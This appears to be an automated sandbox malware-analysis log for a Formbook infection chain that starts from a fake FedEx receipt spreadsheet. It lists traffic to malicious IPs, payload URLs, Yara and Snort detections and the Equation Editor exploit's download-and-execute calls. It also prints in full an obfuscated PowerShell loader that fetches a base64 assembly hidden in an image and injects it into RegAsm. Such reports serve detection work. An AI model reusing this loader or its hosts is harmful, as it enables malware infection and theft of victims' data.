Source: global traffic TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443

Networking

Source: Traffic Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 41.216.183.13:80 -> 192.168.2.22:49175
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 41.216.183.13 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess, 7_2_036407AB
Source: global traffic HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /88077/BNNJ.txt HTTP/1.1Host: 23.95.235.16Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 194.163.41.117 194.163.41.117
Source: Joe Sandbox View IP Address: 23.95.235.16 23.95.235.16
Source: Joe Sandbox View ASN Name: NEXINTO-DE NEXINTO-DE
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic HTTP traffic detected: GET /BrlcB HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ilang.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /88077/ima/ima.imim.im.imim.doC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /88077/imagesofrosepetelflowerstogetitgreat.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Users_API/syscore/file_m0veebx3.y4i.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13
Source: unknown HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess, 7_2_036407AB
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B654C9D0.emf
Source: global traffic HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /BrlcB HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ilang.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /88077/ima/ima.imim.im.imim.doC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /88077/imagesofrosepetelflowerstogetitgreat.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Users_API/syscore/file_m0veebx3.y4i.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13
Source: global traffic HTTP traffic detected: GET /88077/BNNJ.txt HTTP/1.1Host: 23.95.235.16Connection: Keep-Alive
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: ilang.in
Source: global traffic DNS traffic detected: DNS query: uploaddeimagens.com.br
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://23.95.235.16
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://23.95.235.16/88077/BNNJ.txt
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://23.95.235.16/88077/BNP
Source: EQNEDT32.EXE, 00000007.00000002.455223892.00000000005F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gif
Source: EQNEDT32.EXE, 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gifj
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://23.95.24
Source: wscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_B
Source: wscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481376582.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481166475.00000000004AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481370525.000000000049F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481299140.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, magesofrosepetelflowerstogetitgrea.vBS.7.dr, imagesofrosepetelflowerstogetitgreat[1].gif.7.dr String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txt
Source: wscript.exe, 00000009.00000003.480557490.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481408431.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481147687.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481281597.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481123191.00000000004D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtr
Source: wscript.exe, 00000009.00000003.480862214.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.480557490.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481272894.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481430080.00000000004EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtz
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ilang.in.url.4.dr String found in binary or memory: http://ilang.in/
Source: FedEx Receipt_53065724643.xls, BrlcB.url.4.dr String found in binary or memory: http://ilang.in/BrlcB
Source: B9930000.0.dr, ~DF189859C23F2234A3.TMP.0.dr String found in binary or memory: http://ilang.in/BrlcByX
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 0000000A.00000002.474007800.0000000002611000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4;
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443

E-Banking Fraud

Source: Yara match File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: FedEx Receipt_53065724643.xls OLE: Microsoft Excel 2007+
Source: ~DFE1D622D06AD63FEF.TMP.0.dr OLE: Microsoft Excel 2007+
Source: ~DF5C7C8EE0310B7690.TMP.0.dr OLE: Microsoft Excel 2007+
Source: B9930000.0.dr OLE: Microsoft Excel 2007+
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BrlcB.url
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ilang.in.url
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process Stats: CPU usage > 49%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0042B243 NtClose, 12_2_0042B243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_023907AC NtCreateMutant,LdrInitializeThunk, 12_2_023907AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk, 12_2_0238FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_0238FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238F9F0 NtClose,LdrInitializeThunk, 12_2_0238F9F0
